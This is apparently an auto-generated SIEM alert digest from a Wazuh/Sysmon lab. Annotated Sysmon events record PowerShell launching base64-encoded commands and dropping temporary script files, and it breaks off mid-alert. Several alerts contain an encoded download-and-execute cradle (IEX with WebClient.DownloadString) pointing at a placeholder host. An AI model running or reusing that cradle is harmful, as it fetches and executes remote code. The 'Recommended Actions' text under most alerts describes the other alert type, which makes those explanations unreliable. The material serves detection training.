🕒 2025-04-24T22:37:06.564+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.564+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1251153
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:44.7394845Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283087
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:44.700 ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ProcessId: 13808 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zlhbjab1.ofo.ps1 CreationUtcTime: 2025-04-24 22:36:44.700 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:44.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zlhbjab1.ofo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:44.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.074+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1253922
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:48.9978915Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283194
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:46.080 ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ProcessId: 12224 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ParentProcessId: 13808 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:46.080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.074+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  43
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1261993
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:49.2137491Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283195
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:49.197 ProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ProcessId: 12224 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_haclrpxn.hq3.ps1 CreationUtcTime: 2025-04-24 22:36:49.197 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:49.197
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_haclrpxn.hq3.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:49.197
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.585+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.585+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1264762
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:51.5380699Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283230
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:50.192 ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ProcessId: 10808 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcfe-680a-020b-000000000e00} ParentProcessId: 12224 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:50.192
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcfe-680a-020b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:08.600+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:08.600+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
